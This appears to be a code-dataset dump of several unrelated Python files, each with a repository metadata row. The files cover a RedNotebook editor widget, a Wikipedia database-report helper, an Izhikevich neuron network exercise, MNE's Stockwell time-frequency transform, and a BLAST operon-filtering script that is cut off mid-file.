            buffer_contents = iter_buffer_contents(textbuffer, None, None, ignore_tag)
            # Output goes to stdout, not to a file.
            out = sys.stdout
            self._html_buffer.set_output(out)
            self._html_buffer.write(buffer_contents,
                                    textbuffer.tag_table,)
            ##title=title)
            out.flush()
        except IOError, e:
            # NOTE(review): `filename` is undefined in this scope; if this
            # branch ever runs it raises NameError instead — verify.
            raise RichTextError("Could not save '%s'." % filename, e)
        textbuffer.set_modified(False)
    def _load_images(self, textbuffer, path):
        """Load images present in textbuffer"""
        for kind, it, param in iter_buffer_contents(textbuffer, None, None,
                                                    ignore_tag):
            if kind == "anchor":
                child, widgets = param
                if isinstance(child, RichTextImage):
                    filename = child.get_filename()
                    if is_relative_file(filename):
                        filename = os.path.join(path, filename)
                    ## For absolute windows filenames
                    if filename.startswith('file://'):
                        filename = filename[7:]
                    ## Modified
                    # Remote or file: URLs load asynchronously; everything
                    # else is treated as a local path.
                    if filename.startswith("http:") or \
                       filename.startswith("file:"):
                        child.set_from_url(filename, os.path.basename(filename))
                    else:
                        child.set_from_file(filename)
class HtmlEditor(KeepNoteEditor):
    # Scrolled HTML preview widget built from an HtmlView + HtmlIO pair.
    def __init__(self):
        '''
        Do not call the KeepNoteEditor constructor, because we need our own
        classes here.
        '''
        ##KeepNoteEditor.__init__(self, None)
        gtk.VBox.__init__(self, False, 0)
        # state
        self._textview = HtmlView()  # the rich-text widget showing the HTML
        self._textview_io = HtmlIO()
        self._sw = gtk.ScrolledWindow()
        self._sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
        self._sw.set_shadow_type(gtk.SHADOW_IN)
        self._sw.add(self._textview)
        self.pack_start(self._sw)
        # Only image activation is handled; font/modified/url callbacks from
        # KeepNoteEditor are intentionally not connected.
        self._textview.connect("child-activated", self._on_child_activated)
        self._textview.disable()
        self.load_html('<html></html>')
        self.show_all()
    def load_html(self, html):
        # Newlines are layout-irrelevant in HTML and confuse the reader.
        html = html.replace('\n', '')
        self._textview_io.load(self._textview, self._textview.get_buffer(), \
                                html)
    def _on_child_activated(self, textview, child):
        # Double-clicking an embedded image opens it externally.
        if isinstance(child, RichTextImage):
            filesystem.open_url(child.get_filename())
    def get_html(self):
        # Writes the buffer contents as HTML (HtmlIO.save emits to stdout).
        # The original implementation contained unreachable statements after
        # this return that referenced undefined names; they have been removed.
        self._textview_io.save(self._textview.get_buffer())
        return
    def set_editable(self, editable):
        # Toggle both editability and cursor visibility together.
        self._textview.set_editable(editable)
        self._textview.set_cursor_visible(editable)
    def set_font_size(self, size):
        self._textview.modify_font(pango.FontDescription(str(size)))
    def highlight(self, string):
        # Delegate search-and-select to the view.
        self._textview.highlight(string)
| pakesson/rednotebook | rednotebook/gui/richtext.py | Python | gpl-2.0 | 11,878 | [
"VisIt"
] | a00b246063f861ddfbce0fee1f31e856e19a60ca2bc91fdbe446f1f1780e602f |
# Copyright (C) 2015 Hydriz Scholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA, or visit
# <http://www.gnu.org/copyleft/gpl.html>
import datetime
import MySQLdb
import settings
import wikitools
class DBQuery:
    """Minimal helper for running a single read-only query on a Labs replica."""
    def __init__(self, database='', host='s3.labsdb', read_default_file='~/.my.cnf'):
        self.read_default_file = read_default_file
        self.host = host
        # Public (replicated) databases carry a "_p" suffix on Labs.
        self.database = database + '_p'
    def execute(self, query):
        """Run *query* and return every row as a tuple of tuples."""
        connection = MySQLdb.connect(host=self.host, db=self.database,
                                     read_default_file=self.read_default_file)
        cur = connection.cursor()
        cur.execute(query)
        rows = cur.fetchall()
        cur.close()
        connection.close()
        return rows
class Wiki:
    # Wrapper around wikitools for publishing database reports to a wiki.
    def __init__( self, wikidb ):
        self.database = wikidb
        # NOTE(review): only these two wikis are supported; any other wikidb
        # leaves apiUrl/reportPrefix unset and outputToWiki will fail with
        # AttributeError — confirm callers never pass other values.
        if ( self.database == "simplewiki" ):
            self.apiUrl = "https://simple.wikipedia.org/w/api.php"
            self.reportPrefix = "Wikipedia:Database reports"
        elif ( self.database == "simplewiktionary" ):
            self.apiUrl = "https://simple.wiktionary.org/w/api.php"
            self.reportPrefix = "Wiktionary:Database reports"
        # Credentials and edit summary come from the settings module.
        self.username = settings.username
        self.password = settings.password
        self.summary = settings.summary
    def outputToWiki( self, title, contents ):
        # Log in and save *contents* to "<reportPrefix>/<title>" as a bot edit.
        self.wiki = wikitools.Wiki( self.apiUrl )
        self.wiki.login( self.username, self.password )
        title = "%s/%s" % ( self.reportPrefix, title )
        report = wikitools.Page( self.wiki, title )
        reporttext = contents
        report.edit( reporttext, summary=self.summary, bot=1 )
    def getDataAsOf( self ):
        # Compute the replica's data timestamp (now minus replication lag),
        # formatted as a wiki-style UTC timestamp. Returns on the first row.
        query = "SELECT UNIX_TIMESTAMP() - UNIX_TIMESTAMP(rc_timestamp) FROM recentchanges ORDER BY rc_timestamp DESC LIMIT 1;"
        self.DBQuery = DBQuery( self.database )
        replag = self.DBQuery.execute( query )
        for seconds in replag:
            result = ( datetime.datetime.utcnow() - datetime.timedelta( seconds=int( float( seconds[0] ) ) ) ).strftime( '%H:%M, %d %B %Y (UTC)' )
            return result
if __name__ == "__main__":
    # Library module: refuse direct execution. The parenthesised print keeps
    # this line valid under both Python 2 and Python 3 (the original bare
    # print statement is a SyntaxError on Python 3).
    print("This module should not be called directly! Please use dbr.py to run the database reports.")
"VisIt"
] | b39a77a900669030a90fac1a6e1fddc41f10fbc2439fa5188bfae4a45468a5b8 |
"""
Computational Neurodynamics
Exercise 2
(C) Murray Shanahan et al, 2015
"""
from IzNetwork import IzNetwork
import numpy as np
import numpy.random as rn
def Connect2L(N0, N1):
    """
    Constructs two layers of Izhikevich neurons and connects them together.
    Layers are arrays of N neurons. Parameters for regular spiking neurons
    extracted from:
    http://www.izhikevich.org/publications/spikes.htm

    Args:
        N0: number of neurons in layer 0 (source layer).
        N1: number of neurons in layer 1 (target layer).
    Returns:
        The populated IzNetwork instance.
    """
    F = 50 / np.sqrt(N1)  # Scaling factor (normalises total input by layer size)
    D = 5  # Conduction delay
    Dmax = 10  # Maximum conduction delay
    net = IzNetwork([N0, N1], Dmax)
    # Neuron parameters
    # Each layer comprises a heterogenous set of neurons, with a small spread
    # of parameter values, so that they exhibit some dynamical variation
    # (To get a homogenous population of canonical "regular spiking" neurons,
    # multiply r by zero.)
    # Layer 0 (regular spiking)
    r = rn.rand(N0)
    net.layer[0].N = N0
    net.layer[0].a = 0.02 * np.ones(N0)
    net.layer[0].b = 0.20 * np.ones(N0)
    # r**2 biases the spread towards the canonical values c=-65, d=8.
    net.layer[0].c = -65 + 15 * (r**2)
    net.layer[0].d = 8 - 6 * (r**2)
    # Layer 1 (regular spiking)
    r = rn.rand(N1)
    net.layer[1].N = N1
    net.layer[1].a = 0.02 * np.ones(N1)
    net.layer[1].b = 0.20 * np.ones(N1)
    net.layer[1].c = -65 + 15 * (r**2)
    net.layer[1].d = 8 - 6 * (r**2)
    # Connectivity matrix (synaptic weights)
    # layer[i].S[j] is the connectivity matrix from layer j to layer i
    # S(i,j) is the strength of the connection from neuron j to neuron i
    # All-to-all connectivity with uniform weight, scaled by F, delay D.
    net.layer[1].S[0] = np.ones([N1, N0])
    net.layer[1].factor[0] = F
    net.layer[1].delay[0] = D * np.ones([N1, N0], dtype=int)
    return net
| lawrencejones/neuro | Exercise_2/Connect2L.py | Python | gpl-3.0 | 1,685 | [
"NEURON"
] | 94b68d4c15a01914af62bb49f7a031dcf39a9c8b2425bc404d6ec304cbeff425 |
# Authors : Denis A. Engemann <denis.engemann@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License : BSD 3-clause
from copy import deepcopy
import math
import numpy as np
from scipy import fftpack
# XXX explore cuda optimazation at some point.
from ..io.pick import pick_types, pick_info
from ..utils import logger, verbose
from ..parallel import parallel_func, check_n_jobs
from .tfr import AverageTFR, _get_data
def _check_input_st(x_in, n_fft):
"""Aux function"""
# flatten to 2 D and memorize original shape
n_times = x_in.shape[-1]
def _is_power_of_two(n):
return not (n > 0 and ((n & (n - 1))))
if n_fft is None or (not _is_power_of_two(n_fft) and n_times > n_fft):
# Compute next power of 2
n_fft = 2 ** int(math.ceil(math.log(n_times, 2)))
elif n_fft < n_times:
raise ValueError("n_fft cannot be smaller than signal size. "
"Got %s < %s." % (n_fft, n_times))
zero_pad = None
if n_times < n_fft:
msg = ('The input signal is shorter ({0}) than "n_fft" ({1}). '
'Applying zero padding.').format(x_in.shape[-1], n_fft)
logger.warning(msg)
zero_pad = n_fft - n_times
pad_array = np.zeros(x_in.shape[:-1] + (zero_pad,), x_in.dtype)
x_in = np.concatenate((x_in, pad_array), axis=-1)
return x_in, n_fft, zero_pad
def _precompute_st_windows(n_samp, start_f, stop_f, sfreq, width):
"""Precompute stockwell gausian windows (in the freq domain)"""
tw = fftpack.fftfreq(n_samp, 1. / sfreq) / n_samp
tw = np.r_[tw[:1], tw[1:][::-1]]
k = width # 1 for classical stowckwell transform
f_range = np.arange(start_f, stop_f, 1)
windows = np.empty((len(f_range), len(tw)), dtype=np.complex)
for i_f, f in enumerate(f_range):
if f == 0.:
window = np.ones(len(tw))
else:
window = ((f / (np.sqrt(2. * np.pi) * k)) *
np.exp(-0.5 * (1. / k ** 2.) * (f ** 2.) * tw ** 2.))
window /= window.sum() # normalisation
windows[i_f] = fftpack.fft(window)
return windows
def _st(x, start_f, windows):
"""Implementation based on Ali Moukadem Matlab code (only used in tests)"""
n_samp = x.shape[-1]
ST = np.empty(x.shape[:-1] + (len(windows), n_samp), dtype=np.complex)
# do the work
Fx = fftpack.fft(x)
XF = np.concatenate([Fx, Fx], axis=-1)
for i_f, window in enumerate(windows):
f = start_f + i_f
ST[..., i_f, :] = fftpack.ifft(XF[..., f:f + n_samp] * window)
return ST
def _st_power_itc(x, start_f, compute_itc, zero_pad, decim, W):
"""Aux function"""
n_samp = x.shape[-1]
n_out = (n_samp - zero_pad)
n_out = n_out // decim + bool(n_out % decim)
psd = np.empty((len(W), n_out))
itc = np.empty_like(psd) if compute_itc else None
X = fftpack.fft(x)
XX = np.concatenate([X, X], axis=-1)
for i_f, window in enumerate(W):
f = start_f + i_f
ST = fftpack.ifft(XX[:, f:f + n_samp] * window)
TFR = ST[:, :-zero_pad:decim]
TFR_abs = np.abs(TFR)
if compute_itc:
TFR /= TFR_abs
itc[i_f] = np.abs(np.mean(TFR, axis=0))
TFR_abs *= TFR_abs
psd[i_f] = np.mean(TFR_abs, axis=0)
return psd, itc
def _induced_power_stockwell(data, sfreq, fmin, fmax, n_fft=None, width=1.0,
                             decim=1, return_itc=False, n_jobs=1):
    """Computes power and intertrial coherence using Stockwell (S) transform
    Parameters
    ----------
    data : ndarray
        The signal to transform. Any dimensionality supported as long
        as the last dimension is time.
    sfreq : float
        The sampling frequency.
    fmin : None, float
        The minimum frequency to include. If None defaults to the minimum fft
        frequency greater than zero.
    fmax : None, float
        The maximum frequency to include. If None defaults to the maximum fft.
    n_fft : int | None
        The length of the windows used for FFT. If None, it defaults to the
        next power of 2 larger than the signal length.
    width : float
        The width of the Gaussian window. If < 1, increased temporal
        resolution, if > 1, increased frequency resolution. Defaults to 1.
        (classical S-Transform).
    decim : int
        The decimation factor on the time axis. To reduce memory usage.
    return_itc : bool
        Return intertrial coherence (ITC) as well as averaged power.
    n_jobs : int
        Number of parallel jobs to use.
    Returns
    -------
    st_power : ndarray
        The multitaper power of the Stockwell transformed data.
        The last two dimensions are frequency and time.
    itc : ndarray
        The intertrial coherence. Only returned if return_itc is True.
    freqs : ndarray
        The frequencies.
    References
    ----------
    Stockwell, R. G. "Why use the S-transform." AMS Pseudo-differential
        operators: Partial differential equations and time-frequency
        analysis 52 (2007): 279-309.
    Moukadem, A., Bouguila, Z., Abdeslam, D. O, and Dieterlen, A. Stockwell
        transform optimization applied on the detection of split in heart
        sounds (2014). Signal Processing Conference (EUSIPCO), 2013 Proceedings
        of the 22nd European, pages 2015--2019.
    Wheat, K., Cornelissen, P. L., Frost, S.J, and Peter C. Hansen (2010).
        During Visual Word Recognition, Phonology Is Accessed
        within 100 ms and May Be Mediated by a Speech Production
        Code: Evidence from Magnetoencephalography. The Journal of
        Neuroscience, 30 (15), 5229-5233.
    K. A. Jones and B. Porjesz and D. Chorlian and M. Rangaswamy and C.
        Kamarajan and A. Padmanabhapillai and A. Stimus and H. Begleiter
        (2006). S-transform time-frequency analysis of P300 reveals deficits in
        individuals diagnosed with alcoholism.
        Clinical Neurophysiology 117 2128--2143
    """
    n_epochs, n_channels = data.shape[:2]
    # Number of output time samples after decimation (ceil division).
    n_out = data.shape[2] // decim + bool(data.shape[2] % decim)
    data, n_fft_, zero_pad = _check_input_st(data, n_fft)
    freqs = fftpack.fftfreq(n_fft_, 1. / sfreq)
    if fmin is None:
        fmin = freqs[freqs > 0][0]
    if fmax is None:
        fmax = freqs.max()
    # Translate the frequency limits into FFT bin indices.
    start_f = np.abs(freqs - fmin).argmin()
    stop_f = np.abs(freqs - fmax).argmin()
    freqs = freqs[start_f:stop_f]
    W = _precompute_st_windows(data.shape[-1], start_f, stop_f, sfreq, width)
    n_freq = stop_f - start_f
    psd = np.empty((n_channels, n_freq, n_out))
    itc = np.empty((n_channels, n_freq, n_out)) if return_itc else None
    # One parallel job per channel; each computes power (and optionally ITC)
    # across epochs for that channel.
    parallel, my_st, _ = parallel_func(_st_power_itc, n_jobs)
    tfrs = parallel(my_st(data[:, c, :], start_f, return_itc, zero_pad,
                          decim, W)
                    for c in range(n_channels))
    for c, (this_psd, this_itc) in enumerate(iter(tfrs)):
        psd[c] = this_psd
        if this_itc is not None:
            itc[c] = this_itc
    return psd, itc, freqs
@verbose
def tfr_stockwell(inst, fmin=None, fmax=None, n_fft=None,
                  width=1.0, decim=1, return_itc=False, n_jobs=1,
                  verbose=None):
    """Time-Frequency Representation (TFR) using Stockwell Transform
    Parameters
    ----------
    inst : Epochs | Evoked
        The epochs or evoked object.
    fmin : None, float
        The minimum frequency to include. If None defaults to the minimum fft
        frequency greater than zero.
    fmax : None, float
        The maximum frequency to include. If None defaults to the maximum fft.
    n_fft : int | None
        The length of the windows used for FFT. If None, it defaults to the
        next power of 2 larger than the signal length.
    width : float
        The width of the Gaussian window. If < 1, increased temporal
        resolution, if > 1, increased frequency resolution. Defaults to 1.
        (classical S-Transform).
    decim : int
        The decimation factor on the time axis. To reduce memory usage.
    return_itc : bool
        Return intertrial coherence (ITC) as well as averaged power.
    n_jobs : int
        The number of jobs to run in parallel (over channels).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    Returns
    -------
    power : AverageTFR
        The averaged power.
    itc : AverageTFR
        The intertrial coherence. Only returned if return_itc is True.
    See Also
    --------
    cwt : Compute time-frequency decomposition with user-provided wavelets
    cwt_morlet, psd_multitaper
    Notes
    -----
    .. versionadded:: 0.9.0
    """
    # verbose dec is used b/c subfunctions are verbose
    data = _get_data(inst, return_itc)
    # Restrict the computation to MEG and EEG channels.
    picks = pick_types(inst.info, meg=True, eeg=True)
    info = pick_info(inst.info, picks)
    data = data[:, picks, :]
    n_jobs = check_n_jobs(n_jobs)
    power, itc, freqs = _induced_power_stockwell(data,
                                                 sfreq=info['sfreq'],
                                                 fmin=fmin, fmax=fmax,
                                                 n_fft=n_fft,
                                                 width=width,
                                                 decim=decim,
                                                 return_itc=return_itc,
                                                 n_jobs=n_jobs)
    # Decimate the time axis to match the decimated TFR output.
    times = inst.times[::decim].copy()
    nave = len(data)
    out = AverageTFR(info, power, times, freqs, nave, method='stockwell-power')
    if return_itc:
        # Deep copies so the two AverageTFR objects do not share state.
        out = (out, AverageTFR(deepcopy(info), itc, times.copy(),
                               freqs.copy(), nave, method='stockwell-itc'))
    return out
| cmoutard/mne-python | mne/time_frequency/_stockwell.py | Python | bsd-3-clause | 9,819 | [
"Gaussian"
] | ca5d491f24775df3dae0a7b414762accfa6d348cad83e7d749e9b3f5b70b9056 |
#!/usr/bin/python
from multiprocessing import Pool
import time
import os
import sys
import argparse
import math
from homolog4 import *
from collections import defaultdict
import itertools
# Copyright(C) 2014 David Ream
# Released under GPL version 3 licence. http://www.gnu.org/licenses/lgpl.html
# Do not remove this comment
# This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else.
def parser_code():
    """Build the command-line parser and parse sys.argv.

    Returns the argparse namespace with: infolder, outfolder, filter,
    num_proc, eval and max_gap. Validation happens later in check_options.
    """
    parser = argparse.ArgumentParser(description="This program will be used to remove spurious results from a BLAST search organized by operon.")
    parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse/', metavar="DIRECTORY",
                        help="A folder that contains the operon BLAST results.")
    parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="DIRECTORY", default='./optimized_operon/',
                        help="Folder where the filtered results will be stored. Default is the folder './optimized_operon/'.")
    parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE",
                        help="A file that contains the operons that are under investigation. All others will be omitted from analysis an results.")
    parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int,
                        help="Number of processors that you want this script to run on. The default is every CPU that the system has.")
    parser.add_argument("-e", "--eval", dest="eval", default='1e-10', metavar="FLOAT", type=float,
                        help="Use this option to change the eval for the BLAST search that is permitted. Useful if you would like to investigate what altering the eval threshold will do to your results.")
    parser.add_argument("-g", "--max_gap", dest="max_gap", metavar="INT", default = 500, type=int,
                        help="Largest allowable gap to be considered a gene block by the analysis.")
    return parser.parse_args()
def check_options(parsed_args):
    """Validate the parsed command-line options and normalize them.

    Prints an error message and terminates the program (sys.exit) on any
    invalid input.

    :param parsed_args: argparse.Namespace produced by parser_code()
    :return: tuple (infolder, outfolder, filter_file, num_proc, e_val, max_gap)
    """
    # The input folder must already exist; it is never created for the user.
    if os.path.isdir(parsed_args.infolder):
        infolder = parsed_args.infolder
    else:
        print "The folder %s does not exist." % parsed_args.infolder
        sys.exit()
    # if the directory that the user specifies does not exist, then the program makes it for them.
    if not os.path.isdir(parsed_args.outfolder):
        os.makedirs(parsed_args.outfolder)
    outfolder = parsed_args.outfolder
    # Normalize to a trailing slash so later string concatenation forms valid paths.
    if outfolder[-1] != '/':
        outfolder = outfolder + '/'
    # An empty filter string is a valid sentinel meaning "no filtering".
    if os.path.exists(parsed_args.filter):
        filter_file = parsed_args.filter
    elif parsed_args.filter == '':
        filter_file = parsed_args.filter
    else:
        print "The file %s does not exist." % parsed_args.filter
        sys.exit()
    # section of code that deals determining the number of CPU cores that will be used by the program
    # Clamp the requested CPU count to [1, available cores].
    if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"):
        num_proc = os.sysconf("SC_NPROCESSORS_CONF")
    elif parsed_args.num_proc < 1:
        num_proc = 1
    else:
        num_proc = int(parsed_args.num_proc)
    # validate the input for the eval
    # NOTE(review): argparse already applied type=float to --eval, so this
    # conversion is defensive and should never fail in practice.
    try:
        e_val = float(parsed_args.eval)
    except:
        print "The e-value you entered is not a floating point number, please enter a floating point number, ex. '1e-3', or '12'."
        sys.exit()
    # validate the input for the maximum allowed gap
    # NOTE(review): likewise, type=int already converted --max_gap; only the
    # positivity check adds new validation here.
    try:
        max_gap = int(parsed_args.max_gap)
        if max_gap <= 0:
            print "The gap that you entered %s is a negative number, please enter a positive integer." % parsed_args.max_gap
            sys.exit()
        else:
            pass
    except:
        print "The gap that you entered %s is not an integer, please enter a positive integer." % parsed_args.max_gap
        sys.exit()
    return infolder, outfolder, filter_file, num_proc, e_val, max_gap
#this function will return all of the files that are in a directory. os.walk is recursive traversal.
def return_recursive_dir_files(root_dir):
    """Recursively collect every regular file underneath root_dir.

    :param root_dir: directory whose tree is traversed with os.walk
    :return: list of full paths, one per file found
    """
    return [os.path.join(dirpath, name)
            for dirpath, _dirnames, filenames in os.walk(root_dir)
            for name in filenames
            if os.path.isfile(os.path.join(dirpath, name))]
def return_file_list(infolder, filter_file):
    """Return the result files to analyse.

    :param infolder: folder containing per-operon BLAST result files
    :param filter_file: path to a file listing operon names to keep, one per
                        line; an empty string means "keep everything"
    :return: list of file paths; when filtering, only files whose basename
             (before the first '.') appears in the filter file are kept
    """
    all_files = return_recursive_dir_files(infolder)
    if filter_file == '':
        return all_files
    # Fix: the original leaked the filter file handle (open() without close);
    # a with-block closes it deterministically.  A set also makes the
    # membership test O(1) instead of a linear scan per file.
    with open(filter_file) as handle:
        wanted = set(line.strip() for line in handle)
    return [fname for fname in all_files
            if os.path.basename(fname).split('.')[0] in wanted]
# This function will take a BLAST tabular result, and remove any hits that are worse than the eval threshold provided
# The return will be a list of those hits as homolog objects.
def filter_eval(fname, e_val):
    """Parse a tabular BLAST result file and keep hits at or below the cutoff.

    :param fname: path to a BLAST tabular result file
    :param e_val: maximum permitted e-value (inclusive)
    :return: list of Homolog objects whose e_val() passes the threshold
    """
    # Fix: the original opened the file without closing it and materialized
    # the lines twice (readlines + iteration); a with-block closes the handle
    # deterministically and we iterate the file object directly.
    with open(fname) as handle:
        h_list = [Homolog.from_blast(line) for line in handle]
    return [h for h in h_list if h.e_val() <= e_val]
def resolve_multiple_ORF_hits(hlist):
    """Collapse consecutive BLAST hits that map to the same ORF.

    The input is expected to be sorted by start coordinate; whenever two
    consecutive hits share a start position, only the one with the more
    significant (smaller) e-value is kept.  On ties the earlier hit wins.

    :param hlist: non-empty, start-sorted list of homolog objects
    :return: list with per-ORF duplicates resolved
    """
    kept = [hlist[0]]
    previous = hlist[0]
    for candidate in hlist[1:]:
        if previous.start() == candidate.start():
            # Same ORF: keep whichever hit has the better e-value.
            if candidate.e_val() < previous.e_val():
                kept[-1] = candidate
        else:
            kept.append(candidate)
        # Advance regardless of whether the candidate was kept, mirroring the
        # original pairwise comparison of consecutive entries.
        previous = candidate
    return kept
# The purpose of this function is to take a list of homologs, that have been e_val (or potenitally another means) filtered.
# The return is all homologs from organisms that contain at least one neighborhood defined by max_gap.
def return_valid_organism_homologs(hlog_list, max_gap):
    """Group filtered homologs per organism and keep only organisms with at
    least one gene neighborhood (as defined by max_gap).

    :param hlog_list: flat list of homolog objects (already e-value filtered)
    :param max_gap: largest allowed gap for two genes to count as neighbors
    :return: tuple (neighborhood_dict, org_dict), both keyed by accession and
             restricted to organisms that contain a neighborhood.
             neighborhood_dict maps to a list of gene-block lists,
             org_dict maps to the flat ORF-deduplicated homolog list.
    """
    org_dict = {}
    # Stage 1: read the list of homologs in, and organize based on accession. Each accession will have a list of homologs for a given operon.
    # Prior to this, the program does not sort the output.
    # This section has been tested and validated to the best of my abilities.
    #print len(hlog_list)
    for item in hlog_list:
        accession = item.accession()
        #print accession
        # NOTE(review): 'in org_dict.keys()' is a linear scan under Python 2;
        # 'accession in org_dict' would be a constant-time lookup.
        if accession in org_dict.keys():
            org_dict[accession].append(item)
        else:
            org_dict.update({accession:[item]})
    # Stage 2: Sort the list of homologs for each organism. Determine gene blocks based on the max_gap criterion,
    # and reject organisms without a gene block.
    # This section has been tested, but not extensively. I have added resolve_multiple_ORF_hits which is untested.
    for accession in sorted(org_dict.keys()):
        # pop + update replaces each value in place with its deduplicated form.
        h_list = org_dict.pop(accession)
        h_list.sort(key=lambda x: x.start())
        # Here is where the code dealing explicitly with multiple hits to a single ORF goes:
        # currently, we only use best hit. Other resolution schemes can be envisioned.
        ORF_filetered_hlist = resolve_multiple_ORF_hits(h_list)
        org_dict.update({accession:ORF_filetered_hlist})
    # Stage 3: Organize the homologs into neighborhoods. We remove any organisms that lack neighboring genes.
    # The return from this stage is a list of lists. Where each sub-list is a gene block, as defined by max_gap.
    # This version is not completely tested, but appears to be working when tested against known cases.
    neighborhood_dict = {}
    for accession in sorted(org_dict.keys()):
        hlist = org_dict.pop(accession)
        gene_block_list, neighborhood_found = group_homologs(hlist, max_gap)
        if neighborhood_found:
            neighborhood_dict.update({accession:gene_block_list})
            # Re-insert only organisms that do have a neighborhood; rejected
            # organisms stay popped, which is how the filtering happens.
            org_dict.update({accession:hlist})
        # Enable the print organism bit to see what we filter out initially...
        else: # do nothing, there are no neighborhoods that have been recovered
            #print "accession", accession, "is missing."
            #print "Organism ", hlist[0].organism(), "is missing."
            #print hlist
            pass
    # An explanation on what each of these returned dictionaries contains:
    # Each has organisms that only contain gene neighborhoods.
    # neighborhood_dict: accession keyed dict whose data is a list of neighborhods. organism1:[[h1, h2], [h3, h4], [h5]]
    # org_dict: accession keyed dict whose data is a list of ungrouped homologs. organism1:[h1, h2, h3, h4, h5]
    # org_dict differs from the inpupt (besides being a dict and not a list) by
    return neighborhood_dict, org_dict
# I think this version is more readable than those i have made in the past.
# It can take either a sorted, or unsorted list of homologs.
def group_homologs(lst_homologs, max_gap):
    """Sort homologs by start coordinate and split them into gene blocks.

    Accepts a sorted or unsorted list; the caller's list is never mutated
    because sorted() produces a fresh copy.

    :param lst_homologs: list of homolog objects
    :param max_gap: largest allowed gap between neighboring genes
    :return: tuple (list of gene-block lists, True if any block has >1 gene)
    """
    ordered = sorted(lst_homologs, key=lambda h: h.start())
    return homolog_list_grouping_function(ordered, max_gap)
# This function will take a list of ordered homologs, which have had their redundant BLAST thits removed, and group them by a max_gap constraint.
# The return is a list of lists. Single genes and gene blocks will both be represented as groups.
def homolog_list_grouping_function(list_homologs, max_gap):
    """Partition start-sorted, ORF-deduplicated homologs into gene blocks.

    Two consecutive genes belong to the same block when the distance between
    one gene's start and the other's stop (in either direction) is below
    max_gap.  Singletons are reported as one-element groups.

    :param list_homologs: non-empty, start-sorted list of homolog objects
    :param max_gap: distance threshold defining neighboring genes
    :return: tuple (list of groups, True if any group holds >=2 genes)
    """
    groups = []
    current_block = [list_homologs[0]]
    found_neighbors = False
    for hlog in list_homologs[1:]:
        anchor = current_block[-1]
        # Neighboring when either orientation of the gap is under the limit.
        adjacent = (math.fabs(anchor.start() - hlog.stop()) < max_gap
                    or math.fabs(anchor.stop() - hlog.start()) < max_gap)
        if adjacent:
            found_neighbors = True
            current_block.append(hlog)
        else:
            groups.append(current_block)
            current_block = [hlog]
    groups.append(current_block)
    return groups, found_neighbors
# fast implementation of an order preserving make unique function
def make_unique(lst, function):
    """Order-preserving deduplication keyed by function(item).

    :param lst: iterable of items
    :param function: callable mapping an item to its (hashable) identity key
    :return: list keeping only the first item seen for each key
    """
    seen_keys = set()
    unique = []
    for element in lst:
        key = function(element)
        if key not in seen_keys:
            seen_keys.add(key)
            unique.append(element)
    return unique
# This function will take the grouped lists, and determine which gene block genes do not occur as part of a neighborhood.
# These singletons genes will further be filtered for the best e-val as reported by BLAST. (Though other filtering schemes could be developed later)
def return_best_singleton_genes(grouped_lists):
    """Pick the best singleton hit for every annotation that only occurs
    outside of gene neighborhoods.

    :param grouped_lists: list of gene-block lists for one organism (output
                          of group_homologs); blocks of length 1 are singletons
    :return: list of one-element lists, one per annotation that appears only
             as a singleton, keeping the hit with the best (lowest) e-value
    """
    # the result will be a list of lists.
    result = []
    # Step 1: determine all recovered genes (for a given gene block) in this organism
    # return a list of evey homolog found by BLAST as a single list
    organism_genes = list(itertools.chain(*grouped_lists))
    # make list above unique based on the blast_annotation
    unique_in_organism_by_annotation = make_unique(organism_genes, lambda x: x.blast_annotation())
    # resulting in a list of annotations that are unique to the organism
    organism_annotation_list = [i.blast_annotation() for i in unique_in_organism_by_annotation]
    #print "organism_annotation_list", organism_annotation_list
    # Step 2: determine genes that are found in neighborhoods as defined by the max_gap criterion
    # find genes that are grouped
    neighborhoods_only = [i for i in grouped_lists if len(i) > 1]
    # make into a single list of homologs
    neighborhood_hlog_list = list(itertools.chain(*neighborhoods_only))
    # make list above unique based on the blast_annotation
    unique_neighborhood_by_annotation = make_unique(neighborhood_hlog_list, lambda x: x.blast_annotation())
    # resulting in a list of annotations that are unique to neighboring genes
    neighborhood_annotation_list = [i.blast_annotation() for i in unique_neighborhood_by_annotation]
    #print "neighborhood_annotation_list", neighborhood_annotation_list
    # Step 3: return a list of singletons genes, that are only found as singletons in the current genome
    single_annotation_list = list(set(organism_annotation_list) - set(neighborhood_annotation_list))
    singleton_genes = [i for i in grouped_lists if len(i) == 1]
    filtered_singlgeton_genes = [i for i in singleton_genes if i[0].blast_annotation() in single_annotation_list]
    # Step 4: Find the singleton gene that has the most significant e-value per BLAST annotation
    best_singleton_dict = {}
    for tmp in filtered_singlgeton_genes:
        gene = tmp[0]
        # a singleton gene with this annotation has already been found, use e-val to determine wich is the more significant hit
        if gene.blast_annotation() in best_singleton_dict.keys():
            old_gene = best_singleton_dict.pop(gene.blast_annotation())
            if old_gene.e_val() <= gene.e_val(): # the existing homolog is a more significant hit
                best_singleton_dict.update({gene.blast_annotation(): old_gene})
            else: # the new homolog is a more significant hit
                best_singleton_dict.update({gene.blast_annotation(): gene})
        else: # we have not seen this annotation yet, store it in the dictionary
            best_singleton_dict.update({gene.blast_annotation(): gene})
    # Step 5: return a list of lists, [[s1], [s2], [s3]] for each entry in the best_singleton_dict.
    for i in best_singleton_dict.keys():
        result.append([best_singleton_dict[i]])
    return result
# This version is not rigorously tested, but seems to work correctly.
# Return a list of lists of homologs = [[],[]], number of splits, and number of duplications.
# unique_genes_in_organism, len_operon are integers grouped_list is a list of lists, and only contains groups 2 or more.
def optimize_neighborhoods(grouped_lists):
